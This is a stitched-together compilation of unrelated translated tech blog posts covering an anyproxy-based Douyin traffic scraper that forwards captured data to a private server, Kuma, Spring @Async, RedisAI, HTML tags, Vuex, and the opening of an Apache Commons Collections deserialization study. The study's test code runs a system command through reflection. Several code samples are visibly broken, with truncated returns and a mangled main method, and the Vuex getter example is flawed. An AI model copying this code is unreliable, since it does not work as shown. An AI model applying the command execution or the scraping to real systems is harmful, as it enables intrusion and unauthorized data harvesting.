  *onError(requestDetail, error) {
    return null;
  },

  /**
   * @param {any} requestDetail
   * @param {any} error
   * @returns
   */
  *onConnectError(requestDetail, error) {
    return null;
  },

  /**
   * @param {any} requestDetail
   * @param {any} error
   * @returns
   */
  *onClientSocketError(requestDetail, error) {
    return null;
  },
};

// Forward the intercepted data to our own server for storage
function HttpPost(json, url, path) { // send the json to the server: json is the content, url is the captured page address, path is the receiver's path and file name
    console.log("starting the forwarding operation");
    try {
        var http = require('http');
        var data = {
            json: json,
            url: encodeURIComponent(url),
            data: 'Im jiehuhu'
        };
        data = require('querystring').stringify(data);
        var options = {
            method: "POST",
            host: "", // note: no http:// prefix, this is the server's domain name
            port: 8080,
            path: path, // the receiver's path and file name
            headers: {
                'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
                "Content-Length": data.length
            }
        };
        var req = http.request(options, function (res) {
            res.setEncoding('utf8');
            res.on('data', function (chunk) {
                console.log('BODY: ' + chunk);
            });
        });
        req.on('error', function (e) {
            console.log('problem with request: ' + e.message);
        });
        req.write(data);
        req.end();
    } catch (e) {
        console.log("error: " + e);
    }
    console.log("forwarding operation finished");
}




On the back end there is a dedicated project that receives the data anyproxy intercepts and forwards; I use a Java web project named WebCrawler to handle the requests

The Douyin app data-acquisition flow is roughly as follows:



The stack here is Java + Tomcat 8 + MySQL, which was my technology stack a year ago; nowadays I much prefer MongoDB and Python, which are faster to work with

Python + MongoDB can also be used to process the data forwarded from anyproxy



The automation part is not finished yet; you can drive the phone with an automated-testing tool such as Appium or QuickMacro

Partial results are as follows: a portion of the Douyin data






Getting the Taobao shop data from the product ID






Fetching a product's Taobao shop information from its ID requires developing another new crawler. I won't explain too much here; it is somewhat harder, as the crawler needs to understand the key point, Taobao's signature mechanism

Taobao's H5 signature mechanism: if you're interested, research it slowly yourself. . . . Anyway, I figured it out, ha ha ha ha


I've put the data I crawled on Baidu Cloud at the link below; take a look if you're interested


Link: https: // Password: 1abc


That is the Douyin data-scraping process, and roughly the idea of extending it to Taobao:

    Use anyproxy to capture all of a Douyin influencer's posts from the Douyin app

    Parse the promoted product IDs inside the posts, and fetch each product's shop information from its ID

    Analyze which products an influencer actually promotes, and which shops they cooperate with

    With large-scale crawling and analysis, you can find out which shops run large-scale promotion on Douyin

About me: a bit of crawling, a bit of backend, a bit of frontend, a bit of data analysis, a bit of algorithms, and a fan of Eason Chan. Care to leave a like?

You can contact me here




This article is original; I typed it out word by word, which was not easy. Please credit the original link when reprinting

This study is for crawler-technology research only. If anyone uses the techniques described here for illegal operations, the consequences are borne by the operator and have nothing to do with this article or its author.



Testing the Kuma Service Mesh with the Bookinfo application

Recently, Kong, the open-source API management platform vendor, released a new open-source project, Kuma. This article deploys the Bookinfo application in a Kuma mesh to help you better understand the Kuma project.


Kuma is a universal control plane for service mesh: through seamless management of layer 4-7 network traffic, microservices, and APIs, it aims to solve the technical limitations of first-generation service meshes.


Kuma emphasizes ease of use, securing the underlying network and making it observable; and although it provides a simple control interface, users can still perform more advanced configuration. Kuma pairs a fast data plane with an advanced control plane, letting users set permissions, expose metrics, and configure routing rules with simple commands.



In addition, Kuma offers software-defined security, enabling mTLS for all layer 4 traffic; it provides fine-grained traffic control and enhanced layer 4 routing, and it can quickly add tracing and logging capabilities so users can analyze metrics and investigate errors. Kuma runs on any platform, including Kubernetes, virtual machines, containers, bare metal, and traditional environments, so the whole organization can practice cloud native.


Kuma is built on the open-source project Envoy, a proxy designed for cloud-native applications. As the announcement notes, Envoy has already become the de facto standard edge proxy and, together with service mesh, an important building block of cloud-native systems, because for large-scale microservice applications, monitoring, security, and reliability matter all the more.


  • The code used in this article can be found ( at GitHub.





First, configure the control plane with the following command; here it creates a new Mesh named bookinfo in the control plane.


The picture below shows the Bookinfo application architecture, which contains four services: productpage, reviews, details, and ratings; the reviews service additionally provides three versions. In this test, we deploy one instance of each version.




On the data plane, all six instances are deployed on a single server; to avoid conflicts, inbound and outbound ports must be allocated sensibly for each instance, as shown below.


One thing to note: kuma v0.1.2 does not support deploying multiple sidecars on the same host, but the latest master branch has fixed this, so the kuma command-line programs used later in this article were newly compiled from the master branch.


Run the following command to configure the ratings-v1 service.


Run the following command to configure the details-v1 service.


The Bookinfo code from the Istio project has been modified here to support a RATINGS_PORT configuration parameter, including in the productpage service below. Run the following command to configure the reviews-v1 service.


Run the following command to configure the reviews-v2 service.


Run the following command to configure the reviews-v3 service.


Run the following command to configure the productpage-v1 service.


Open a browser and visit http://$IP:10501/productpage; you should see the following, meaning the Bookinfo application deployed successfully. Refreshing the page shows the review scores changing.


To test dynamic configuration updates of the data plane, update the local port of the bookinfo/reviews service and apply it.


Looking at the corresponding data-plane service logs, you can see the new configuration take effect. The problem, however, is that the productpage instance itself still accesses the old port 10504; since the sidecar no longer forwards that port, the service itself breaks. Overall, in Kuma's Universal mode it is good practice to plan applications, services, instances, ports, and the like well in advance, as an upgrade or update may cause a brief service interruption.



To sum up


Kuma's advantages

  1. Lightweight, lightweight, lightweight; important things said three times. A few executable programs are enough to deploy the service-mesh infrastructure;

  2. Supporting multiple Meshes provides noticeably better isolation.


Unresolved Issues


  1. Important features such as TrafficRoute and TrafficTracing are not yet supported, so Kuma is basically still in an unusable state.


  2. Mutual TLS supports only the built-in self-signed certificate, and can only be configured Mesh-wide.


  3. Because there is nothing like Istio's Ingress and Egress, when mutual TLS is enabled services cannot be exposed externally, and internal services cannot reach external services.


  4. To support starting multiple Envoys simultaneously in Universal mode, Envoy hot restart is not supported. However, since xDS configuration is hot-updated, the impact is not significant.


  5. In Universal mode, there is no service registration and discovery: the user must configure an outbound entry for every service an application depends on, and because no DNS is integrated, inter-service access must be specified as IP:Port rather than by Service Name as in Istio. In Kubernetes mode, Kuma relies on the Service mechanism: a Service Name or hostname is resolved to a ClusterIP, and the outgoing HTTP/TCP request is then intercepted by the sidecar and re-forwarded.


  6. A service should avoid calling its dependencies during startup; at that point the sidecar and data plane may not be configured yet, which can cause the service to fail to start.


  7. Looking at Envoy's config_dump shows that the current mode manages plain TCP connections and does not exploit Envoy's stronger capabilities.


  8. In Universal mode, configuring data-plane objects, starting sidecars, and so on all require manual commands; more convenient and user-friendly packaging is a must.


After this test, we can see that Kuma is still at an early stage as a project, but its overall technical direction is good. Unlike Istio, it does not arrive huge and feature-complete all at once; the learning curve is relatively flat, so everyone can get a good sense of both the convenience a service mesh brings and the technical difficulties it entails.


One of the things currently hindering service-mesh adoption is support for legacy systems. In general, an old system needs two rounds of transformation: the first is containerization, enabling it to run on Kubernetes; the second is removing or entirely replacing its RPC framework.


If the mesh could support non-containerized scenarios, the work would be at least halved. We know that Istio has supported mesh expansion since v1.3, that is, integrating bare-metal or virtual-machine hosts into an Istio cluster deployed on Kubernetes. Two modes are currently supported: single-network, where the bare-metal or VM host connects to the Kubernetes internal network or VPC via VPN; and multi-network, where communication goes through an ingress gateway. For now, because Istio itself depends heavily on Kubernetes, and its other features are already fairly complete, adding mesh-expansion functionality is a large amount of work, so both modes are still under development.


By comparison, Kuma offers a fresh approach to using a service mesh on virtual-machine hosts or bare metal; although its current feature completeness is low, it is still worth sustained attention.



Solving asynchronous calls with the @Async annotation

Preamble: @Async in Spring

According to the Spring documentation, method calls are executed synchronously by default, so in Java applications most interactions are processed in a synchronous manner.

Multiple tasks executed this way inevitably affect one another. For example, if task A takes a long time to execute, task B must wait until A finishes before it can start. Likewise, when interacting with third-party systems, slow responses are common. Previously, most such tasks were handled with hand-rolled multithreading; in fact, since Spring 3.x, @Async has provided a complete built-in solution to this problem.

1. What is an asynchronous call?

Before I explain, let’s look at two definitions:

Synchronous call: executed in order, each step waiting for the previous task to finish

The whole flow runs step by step: each step executes in turn and returns its result.

Asynchronous call: the instruction is issued without waiting

It merely sends the call instruction; the caller does not wait for the called method to finish completely, but continues with the rest of the flow.

For example, suppose a flow calls three methods A, B, C in order:
    If they are all synchronous calls, they must finish one after another before the flow is considered done. If B is an asynchronous method, then after A runs, B is invoked; without waiting for B to complete, C starts executing, and only after C finishes is the flow considered done.
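To make this concrete, here is a minimal plain-Java sketch of that A/B/C flow, using CompletableFuture to make B asynchronous (the method structure and log strings are just for illustration):

```java
import java.util.List;
import java.util.concurrent.CompletableFuture;
import java.util.concurrent.CopyOnWriteArrayList;

public class CallOrderDemo {
    // Run A synchronously, B asynchronously, then C; the flow only ends
    // once B has also completed.
    static List<String> run() {
        List<String> log = new CopyOnWriteArrayList<>();
        log.add("A done");                                  // A finishes first
        CompletableFuture<Void> b = CompletableFuture.runAsync(() -> {
            try { Thread.sleep(100); } catch (InterruptedException ignored) { }
            log.add("B done");                              // B runs on another thread
        });
        log.add("C done");                                  // C starts without waiting for B
        b.join();                                           // wait for B before the flow ends
        return log;
    }

    public static void main(String[] args) {
        System.out.println(run());
    }
}
```

Running it logs A and C first, then B, even though B was invoked between them.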


2. The conventional way to handle asynchronous calls

In Java, such scenarios were usually handled by creating a separate thread to run the asynchronous logic, splitting the execution flow between the main thread and other threads; the spawned thread runs independently, so the main thread continues without blocking and waiting. Alternatively, a TaskExecutor can execute the asynchronous thread; see

3. How to enable @Async in Spring?

3.0, introduction to @Async

In Spring, a method annotated with @Async is called an asynchronous method; when invoked, it executes in a separate thread, and the caller can continue with other work without waiting for it to complete.

3.1, enable @Async comment

3.1.1, enabling via Java-based configuration:

@Configuration
@EnableAsync
public class SpringAsyncConfig { ... }  

3.1.2, enabling via Spring Boot configuration:

@SpringBootApplication
@EnableAsync
public class Application {
    public static void main(String[] args) {, args);
    }
}

3.2, using @Async annotation, declare an asynchronous method call

3.2.0 A method with no return value:

Declare the asynchronous call by annotating the method:

    @Async // mark the method as asynchronous
    public void downloadFile() throws Exception { ... } 

3.2.1, a method with a return value:

@Async
public Future<String> asyncMethodWithReturnType() {  
    System.out.println("Execute method asynchronously - " + Thread.currentThread().getName());  
    try {  
        Thread.sleep(5000);  
        return new AsyncResult<String>("hello world !!!!");  
    } catch (InterruptedException e) {  
        // interrupted while simulating slow work
    }  
    return null;  
}
As the example above shows, the returned data type is Future, which is an interface; the concrete result type is AsyncResult, which is the point to note.

Example of invoking the asynchronous method and obtaining its result:

public void testAsyncAnnotationForMethodsWithReturnType()  
        throws InterruptedException, ExecutionException {  
    System.out.println("Invoking an asynchronous method. " + Thread.currentThread().getName());  
    Future<String> future = asyncAnnotationExample.asyncMethodWithReturnType();  
    while (true) {  // loop here, waiting for the result  
        if (future.isDone()) {  // has the async method finished?  
            System.out.println("Result from asynchronous process - " + future.get());  
            break;  
        }  
        System.out.println("Continue doing something else. ");  
        Thread.sleep(1000);  
    }  
}
Such asynchronous methods obtain their results by repeatedly checking the Future's state to see whether the method has finished.
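Outside Spring, the same polling pattern can be sketched with a plain ExecutorService, which shows roughly what @Async does for us under the hood (the task body and timings are illustrative):

```java
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;
import java.util.concurrent.Future;

public class FuturePollingDemo {
    // Submit a slow task, then poll Future.isDone() until the result is
    // ready, mirroring the while(true)/isDone loop in the example above.
    static String runAndPoll() throws Exception {
        ExecutorService pool = Executors.newSingleThreadExecutor();
        Future<String> future = pool.submit(() -> {
            Thread.sleep(50);                // simulate slow work
            return "hello world !!!!";
        });
        String result;
        while (true) {
            if (future.isDone()) {           // has the task finished?
                result = future.get();
                break;
            }
            Thread.sleep(10);                // avoid a busy spin while waiting
        }
        pool.shutdown();
        return result;
    }
}
```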

4. Exception handling for @Async calls

If an exception occurs inside an asynchronous method, the caller cannot perceive it. If exception handling really is needed, proceed as follows:

    Implement a custom AsyncTaskExecutor task executor
            and define the specific exception-handling logic there.

    Configure this custom task executor to replace the built-in TaskExecutor
            Step 1 example: the custom TaskExecutor

public class ExceptionHandlingAsyncTaskExecutor implements AsyncTaskExecutor {  
    private AsyncTaskExecutor executor;  
    public ExceptionHandlingAsyncTaskExecutor(AsyncTaskExecutor executor) {  
        this.executor = executor;  
    }
    public void execute(Runnable task) {       
        executor.execute(createWrappedRunnable(task));  
    }
    public void execute(Runnable task, long startTimeout) {  
        executor.execute(createWrappedRunnable(task), startTimeout);           
    }
    public Future<?> submit(Runnable task) {
        return executor.submit(createWrappedRunnable(task));  
    }
    public <T> Future<T> submit(final Callable<T> task) {  
        return executor.submit(createCallable(task));   
    }
    private <T> Callable<T> createCallable(final Callable<T> task) {   
        return new Callable<T>() {   
            public T call() throws Exception {   
                try {   
                    return;   
                } catch (Exception ex) {   
                    handle(ex);   
                    throw ex;   
                }   
            }   
        };   
    }
    private Runnable createWrappedRunnable(final Runnable task) {   
        return new Runnable() {   
            public void run() {   
                try {  
          ;   
                } catch (Exception ex) {   
                    handle(ex);   
                }   
            }   
        };   
    }
    private void handle(Exception ex) {  
        System.err.println("Error during @Async execution: " + ex);  
    }
}

Analysis: AsyncTaskExecutor is implemented here so that each concrete operation is executed on a separate thread. createCallable and createWrappedRunnable define the exception-handling methods and mechanism.

handle() is where the exception handling we care about goes.
    XML configuration file contents:


It can also be registered as a bean using annotation-based configuration instead.

5. Transaction handling in @Async invocations

When a method annotated with @Async is also annotated with @Transactional, its database operations get no transaction management; the reason is that the method executes asynchronously.

How can we add transaction management to these operations?

Put the database operations that need transaction management inside inner methods, and add @Transactional to those inner methods that the asynchronous method calls.


Method A: annotated with both @Async and @Transactional, but the goal of transaction control is not achieved.

Method B: annotated with @Async; B calls methods C and D on another object, each annotated with @Transactional, and transaction control is achieved.

6. Reference article:



Keep your AI model as close as possible to the data

Source: Redis Labs. Authors: Pieter Cailliau, Luca Antiga. Translator: Kevin (public account: Middleware Little Brother)

Brief introduction

Today we released a preview of RedisAI, with a pre-integrated [tensor]werk component. RedisAI is a Redis module that can serve tensors and execute deep-learning tasks. In this blog post, we introduce the capabilities of this new module and explain why we believe it can upend machine-learning (ML) and deep-learning (DL) solutions. RedisAI was built for two reasons: first, moving data to the host that runs the AI model is costly and severely hurts the real-time experience; second, serving AI models has always been a challenge in DevOps. Our goal with RedisAI is to let users serve, update, and integrate their models well, without moving data out of a multi-node Redis deployment.


Data locality matters

To show why data locality matters for machine-learning and deep-learning models, take a chatbot as an example. Chatbots typically use recurrent neural network (RNN) models, often in a sequence-to-sequence (seq2seq) architecture, to handle user Q&A scenarios. More advanced models use two input vectors and two output vectors, preserving the conversation context in a numeric intermediate-state vector. The model takes the user's last message and the intermediate state representing the conversation history as input, and its output is the reply to the user plus a new intermediate state.

To support user-defined interactions, this intermediate state must be saved in a database, so Redis + RedisAI is a very good option. Below we compare the traditional approach with the RedisAI approach.


1, the traditional approach

To build a chatbot or a similar application, the program typically uses Flask, possibly integrated with Spark. Upon receiving a user message, the server must fetch the intermediate state from Redis. Since Redis has no native tensor data type, the state must first be deserialized; and after the recurrent neural network (RNN) runs, the new intermediate state must be re-serialized before it can be saved back to Redis.


Considering the RNN's time complexity, the CPU cost of serialization/deserialization, and the huge network overhead, we need a better solution to guarantee the user experience.
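To make that serialization cost concrete, here is a plain-Java sketch of the float[] to byte[] round trip that every request pays in the traditional approach (no Redis involved; the encoding shown is one possible choice, not what any specific chatbot uses):

```java
import java.nio.ByteBuffer;

public class StateCodec {
    // The per-request overhead the text describes: the RNN's hidden-state
    // vector must become bytes before it can be stored as a plain Redis
    // string, and bytes must become floats again after it is loaded.
    static byte[] serialize(float[] state) {
        ByteBuffer buf = ByteBuffer.allocate(state.length * Float.BYTES);
        for (float f : state) buf.putFloat(f);
        return buf.array();
    }

    static float[] deserialize(byte[] bytes) {
        ByteBuffer buf = ByteBuffer.wrap(bytes);
        float[] state = new float[bytes.length / Float.BYTES];
        for (int i = 0; i < state.length; i++) state[i] = buf.getFloat();
        return state;
    }
}
```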


2, the RedisAI approach. In RedisAI, we provide a new data type called Tensor; mainstream clients can operate on tensors with just a handful of simple commands. We also provide two additional data types for the model's runtime features: Models and Scripts.


Models are defined with parameters specifying the execution device (CPU or GPU) and the backend. RedisAI has built-in support for mainstream machine-learning frameworks such as TensorFlow and PyTorch, will soon support the ONNX Runtime framework, and will add support for traditional machine-learning models. What is great, though, is that the command that runs a Model is not aware of its backend:

AI.MODELRUN model_key INPUTS input_key1 …  OUTPUTS output_key1 ..

This lets the user decouple the choice of backend (usually made by the data scientist) from the application service; swapping in a replacement model is as simple as setting a new key. RedisAI manages all model-run requests in a queue and executes them on a separate thread, so Redis can still safely answer other normal requests. Scripts can execute on a CPU or GPU and let users operate on tensors with TorchScript, a Python-like custom language that can operate on tensors. This helps users preprocess data before running a model, and can also be used to process the results, for example to improve performance by ensembling different models.
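Because the command is backend-agnostic, a client only ever assembles key names. A small hypothetical helper (not part of RedisAI) might build the argument list like this before sending it through any Redis client:

```java
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;

public class ModelRunCommand {
    // Assemble AI.MODELRUN arguments: the caller names tensors by key and
    // never needs to know which backend (TensorFlow, PyTorch, ...) sits
    // behind the model key.
    static List<String> build(String modelKey, List<String> inputs, List<String> outputs) {
        List<String> args = new ArrayList<>(Arrays.asList("AI.MODELRUN", modelKey, "INPUTS"));
        args.addAll(inputs);
        args.add("OUTPUTS");
        args.addAll(outputs);
        return args;
    }
}
```

Swapping the model then only changes the value stored at the model key; the command the application builds stays identical.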

In the future we plan to support batched execution through a DAG command, which will let users run multiple RedisAI commands in one atomic operation, for example running different instances of a model on different devices and then averaging the predictions in a script. With the DAG command, computations can run in parallel and the results then be aggregated. If you need the full and deeper feature list, visit The new architecture can be simplified as:



Serving models can be simpler

In a production environment, writing code in Jupyter notebooks and deploying it in Flask is not the optimal solution. How can users be sure their resources are used best? If a user's host goes down, what happens to the chatbot's intermediate state? Users may end up reinventing the wheel, re-implementing functionality Redis already has in order to solve these problems. Moreover, since combined solutions are often more complex than expected, stubbornly sticking to the original approach becomes very challenging. RedisAI, through Redis's enterprise-grade data-storage solution and its support for the Tensors, Models, and Scripts types that deep learning needs, integrates Redis deeply with AI models. If the model needs more compute power, simply scale out the Redis cluster; users can thus add as many models as needed in a production environment, reducing infrastructure and total cost. Finally, RedisAI fits well into the existing Redis ecosystem, letting users run Scripts for pre- and post-processing of user data, use RedisGears to do the right conversions on data structures, and use RedisGraph to keep the state up to date.


Conclusions and follow-up plans

1, in the short term, we want RedisAI to support the three major backends (TensorFlow, PyTorch, and ONNX Runtime) and to stabilize and reach a steady state as soon as possible. 2, we want those backends to be dynamically loadable, so users can load only the backends they specify; this would, for example, let a user handle edge cases with TensorFlow Lite. 3, we plan automatic scheduling, automatically merging different queues for the same model. 4, RedisAI will keep run statistics for models, to be used to measure model performance.

5, completing the DAG feature explained above.


For more high-quality middleware technology articles, originals, translations, data, and other good stuff, follow the "Middleware Little Brother" public account!


No JS needed: a few practical page effects in pure HTML

Please credit the source when reprinting: the Grape City official site. Grape City provides professional development tools, solutions, and services for developers. Original source: https: //

In the past, many of the page effects we saw required JS. In this article, I'll show you how to build practical effects of your own with pure HTML.

1. Collapsible accordion

Use the details and summary tags to create a collapsible accordion with no JavaScript code.




<details>
  <summary>Languages Used</summary>
  <p>This page was written in HTML and CSS. The CSS was compiled from SASS. Regardless, this could all be done in plain HTML and CSS</p>
</details>

<details>
  <summary>How it Works</summary>
  <p>Using the sibling and checked selectors, we can determine the styling of sibling elements based on the checked state of the checkbox input element. </p>
</details>


* {
    font-size: 1rem;
    font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Helvetica, Arial, sans-serif;
}

details {
    border: 1px solid #aaa;
    border-radius: 4px;
    padding: .5em .5em 0;
}

summary {
    font-weight: bold;
    margin: -.5em -.5em 0;
    padding: .5em;
}

details[open] {
    padding: .5em;
}

details[open] summary {
    border-bottom: 1px solid #aaa;
    margin-bottom: .5em;
}

Browser support:


2. progress bar

With the basic progress and meter elements plus labels, you can adjust a few attributes to render a progress bar on screen. progress has two attributes, max and value, which calibrate the bar, while meter provides more attributes to customize: min, max, low, high and optimum.






<label for="upload">Upload progress:</label>

<meter id="upload" name="upload"
       min="0" max="100"
       low="33" high="66" optimum="80"
       value="50">
    at 50/100
</meter>


<label for="file">File progress:</label>

<progress id="file" max="100" value="70"> 70% </progress>


body {
  margin: 50px;
}

label {
    padding-right: 10px;
    font-size: 1rem;
    font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Helvetica, Arial, sans-serif;
}

Browser support:




3. More input types

When defining input elements, you should know that modern browsers let you specify quite a few input types. Besides text, email, password and number, which you probably already know, there are the types below.

    date displays a native date picker

    datetime-local a richer date and time picker

    month a friendly month selector

    tel lets you enter a phone number. Open it in a mobile browser and the pop-up keyboard changes; the same is true of email.

    search a text box with a search-friendly style.




<label for="date">Enter date:</label>
<input type="date" id="date"/>

<label for="datetime">Enter date & time:</label>
<input type="datetime-local" id="datetime"/>

<label for="month">Enter month:</label>
<input type="month" id="month"/>

<label for="search">Search for:</label>
<input type="search" id="search"/>

<label for="tel">Enter Phone:</label>
<input type="tel" id="tel">


input, label {display:block; margin: 5px;}
input {margin-bottom:18px;}

MDN's documentation on the new input types is very extensive and full of information. Also open these input elements in a mobile browser to see how the keyboard behaves for each type.

4. Video and Audio

Although the video and audio elements are now part of the HTML standard, you may be surprised that the video tag alone can render a decent video player on screen.

<video controls>

    <source src="" />

    Sorry, your browser doesn't support embedded videos.

</video>

Some attributes of the video tag worth noting include:

    poster the URL of a cover image shown while the video downloads

    preload whether the entire video should be pre-loaded when the page loads

    autoplay whether the video should play automatically when the page loads

Browser support:



5. Proofreading text

When you want to show editing history and proofreading marks, the blockquote, del and ins element tags come in handy.




    There is <del>nothing</del> <ins>no code</ins> either good or bad, but <del>thinking</del> <ins>running it</ins> makes it so.


del {
    text-decoration: line-through;
    background-color: #fbb;
    color: #555;
}

ins {
    text-decoration: none;
    background-color: #d4fcbc;
}

blockquote {
    padding-left: 15px;
    line-height: 30px;
    border-left: 3px solid #d7d7db;
    font-size: 1rem;
    background: #eee;
    width: 200px;
}
6. More consistent quotes

Because quotation marks differ between languages, the q tag gives you a good solution to this problem: it makes quotes in your content render more consistently across most browsers.




<p>Don Corleone said <q cite="">I'm gonna make him an offer he can't refuse. Okay? I want you to leave it all to me. Go on, go back to the party.</q></p>


Don Corleone said <i>"I'm gonna make him an offer he can't refuse. Okay? I want you to leave it all to me. Go on, go back to the party."</i>


body {
  margin: 50px;
}

q {
    font-style: italic;
    color: #000000bf;
}


7. Keyboard tab

The kbd tag may be a little-known one, but as this example shows, it can be used to give key combinations a better style.



<p>I know that <kbd>CTRL</kbd>+<kbd>C</kbd> and <kbd>CTRL</kbd>+<kbd>V</kbd> are among the most used key combinations</p>


body {
  margin: 50px;
}

kbd {
    display: inline-block;
    margin: 0 .1em;
    padding: .1em .6em;
    font-size: 11px;
    line-height: 1.4;
    color: #242729;
    text-shadow: 0 1px 0 #FFF;
    background-color: #e1e3e5;
    border: 1px solid #adb3b9;
    border-radius: 3px;
    box-shadow: 0 1px 0 rgba(12,13,14,0.2), 0 0 0 2px #FFF inset;
    white-space: nowrap;
}

8. Sharing code in HTML

Using the figcaption, pre and code tags, you can display code snippets nicely with pure HTML and CSS.




<figure>
    <figcaption>
      Defining a css <code>color</code> property for a class called 'golden'
    </figcaption>
    <pre><code>
      .golden {
        color: golden;
      }
    </code></pre>
</figure>


pre {
  background-color: #ffbdbd;
}


This article is only a starting point; you may have more techniques of your own, and you're welcome to post them for everyone to share.

In addition, if you are not satisfied with the effects above and hope for more complete dynamic functionality:

For example, if you want to add Excel functionality to your page, you can try the pure front-end spreadsheet control SpreadJS; or if you want to provide users with a more complete, more efficient front-end UI, you may wish to try WijmoJS.

I believe they can add a lot of color to your application.



Understand Vuex in one article


Vuex is a state management library developed specifically for Vue.js applications (official site: https: // It centralizes the state of all components in a single store, with rules ensuring the state can only be changed in a predictable fashion.


In plain language: Vuex is a state management pattern. You can simply think of it as a global object whose properties we can modify and to which we can add methods, but we cannot modify it through direct assignment the way we would a traditional JS object; we must follow the rules Vuex provides.


Vuex exists to solve the problem of passing values between components the traditional way; it spares us the trouble and shortcomings of traditional parent-child value passing in Vue. The official documentation makes this very clear:



Tip: this article uses vuex as a module, with import and export. The article is a bit long; please read it patiently. Of course, it would be even better to code along as you read!

Vuex provides us with four objects in total: state, mutations, getters and actions.

state: the data source of Vuex, where all the public data we need to store lives. It can be simply understood as a transparent warehouse; you can access its data through this.$store.state.variableName.

mutations: the key to the warehouse. The only way to modify the data source is by committing a mutation, which means that to change the data inside the warehouse you must go through this.$store.commit("methodName").

getters: similar to Vue's computed properties. A getter's return value depends on state and changes when the state it depends on changes; if the dependent state has not changed, the cached value is read directly. Getters can therefore be used to watch changes in state. You can think of a getter as a security guard for the warehouse: when the warehouse's data changes, it takes the appropriate measures and reacts accordingly; when nothing changes, it carries on as if nothing had happened (perhaps not the most apt analogy, but you get the idea).

actions: very similar to mutations, except that mutations must be synchronous while actions may perform asynchronous operations. That is, any asynchronous work we need belongs in actions, and an action does not modify state directly; it commits mutations instead. To modify the warehouse's data you still have to go get the key, so actions hand off to mutations, and the mutations do the actual work.



Usage of state:

First, create a new project. I won't go into setting up the Vue environment here; after all, this article is about vuex. Install vuex in the project:

Install vuex with the command: npm install vuex --save

After installing vuex, create a new folder named vuex under the src directory, and a new file store.js inside the vuex folder:


import Vue from 'vue';
import Vuex from 'vuex';

Vue.use(Vuex);

const state={
    number: 1
};

export default new Vuex.Store({
    state
});


Then reference store.js in main.js and add the store object when the Vue instance is created:


import Vue from 'vue'
import App from './App'
import router from './router'

// Reference store.js
import store from './vuex/store'

Vue.config.productionTip = false

/* eslint-disable no-new */
new Vue({
  el: '#app',
  router,
  // Add store to the instantiated object
  store,
  components: { App },
  template: '<App/>'
})

Then modify our App.vue file





As the code above shows, we added a p tag in App.vue. Vuex stipulates that if we need to read data from vuex, i.e. from the state data source of the warehouse, we must access it through this.$store.state.variableName.


Usage of mutations:

If we need to modify the data source in vuex, we can do so by committing a mutation;

First we need to add a button to our view layer to trigger it:




Then modify our store.js:

import Vue from 'vue';
import Vuex from 'vuex';

Vue.use(Vuex);

const state={
    number: 1
};

// Add the mutations object; its state parameter gives access to the state above
const mutations={
    addFunction(state){
        return state.number+=1;
    }
};

// Remember to add mutations to the instance here, or an error will occur
export default new Vuex.Store({
    state,
    mutations
});


We can see directly that we commit a mutation to modify the data source via this.$store.commit('methodName'). Of course, mutations can also receive parameters: the first argument to commit is the mutation's method name, and the second is the payload the mutation receives, which makes our mutations more flexible;


Usage of getters:

getters are similar in usage to Vue's computed properties. They can watch changes to the state data source: if the state a getter depends on has changed, the getter's value changes accordingly.

First we can add the following code in store.js:

import Vue from 'vue';
import Vuex from 'vuex';

Vue.use(Vuex);

const state={
    number: 1
};

// Triggered through the state object above; the state value can be read here
const getters={
    addFunction(state){
        return state.number++;
    }
};

// Remember to add getters when instantiating
export default new Vuex.Store({
    state,
    getters
});


We can change the view in App.vue:



Through the code and view layer above, we can clearly see that when we access the getter, the getter's addFunction method is triggered, and addFunction changes the value of state.number. At that point number has become 2, so the page displays 2, while the getter itself returns 1 because the ++ is applied after the value is read. In other words, when the state.number a getter depends on changes, the getter recomputes; if state.number has not changed, the getter reads from its cache first;


Usage of actions:

The actions object mainly performs asynchronous operations. It is very similar to mutations, except that actions change data by committing mutations instead of changing the state directly;

First, we can change the code store.js in:


import Vue from 'vue';
import Vuex from 'vuex';

Vue.use(Vuex);

const state={
    number: 1
};
const mutations={
    addFunction(state){
        return state.number++;
    }
};
const getters={
    addFunction(state){
        return state.number++;
    }
};
// context is an object with the same properties and methods as the store instance
const actions={
    addFunction(context){
        context.commit("addFunction");
    }
};
// Remember to add actions when instantiating
export default new Vuex.Store({
    state,
    mutations,
    getters,
    actions
});


The modified App.vue code is:








Scenarios for vuex:

In project development, there may be a lot of data or parameters that we need to read or modify in many places, such as a shopping cart. In those cases we can use vuex. After all, vuex is just state management: it provides a convenient model for managing state, but it is not a necessity, because everything state management does can also be achieved by other means. Personally, I feel vuex is somewhat similar to localStorage: both are used to store and modify data, and to avoid losing data across pages;



Apache Commons Collections deserialization: a detailed analysis and learning summary

0x01 Environment preparation:

Apache Commons Collections version 3.1; download link:

jd-gui address (turns a Java jar package back into source files):

Configure the JDK version for the project:

Set the bytecode (class) output path

Add the jar package to the project

Java object arrays (arrays of objects):

Object obj[] = new Object[5];

This creates an Object array of length 5; all 5 elements are null, and the created array reference is assigned to the variable obj. If you need to assign specific objects to these elements, you must assign them individually, initialize the array with the {} literal syntax, or use array utility methods.
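To illustrate the point above, a minimal sketch (the class and variable names here are my own, chosen for the example):

```java
public class ObjectArrayDemo {
    public static void main(String[] args) {
        // An Object array of length 5: every element starts out as null
        Object[] obj = new Object[5];
        System.out.println(obj[0] == null); // prints "true"

        // Elements can be assigned individually...
        obj[0] = new StringBuffer("hi ");

        // ...or the whole array can be initialized at once with the {} syntax,
        // as the poc later does for InvokerTransformer's argument arrays
        Object[] filled = new Object[]{"getRuntime", new Class[0]};
        System.out.println(filled.length); // prints "2"
    }
}
```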



0x02 Environment test:

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.lang.reflect.InvocationTargetException;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.InvokerTransformer;

public class fanshe {
    public static void main(String[] args) throws IllegalAccessException, IllegalArgumentException, InvocationTargetException, NoSuchMethodException, SecurityException, ClassNotFoundException, IOException {
        // Method name, parameter types, parameter values
        Transformer transformer = new InvokerTransformer("append", new Class[]{String.class}, new Object[]{"by SecFree"});
        Object newobject = transformer.transform(new StringBuffer("hi "));
        System.out.println(newobject);
        Runtime r = (Runtime) Class.forName("java.lang.Runtime").getMethod("getRuntime", new java.lang.Class[]{}).invoke(null, new Object[]{});
        System.out.println(new BufferedReader(new InputStreamReader(r.exec("whoami").getInputStream())).readLine());
    }
}

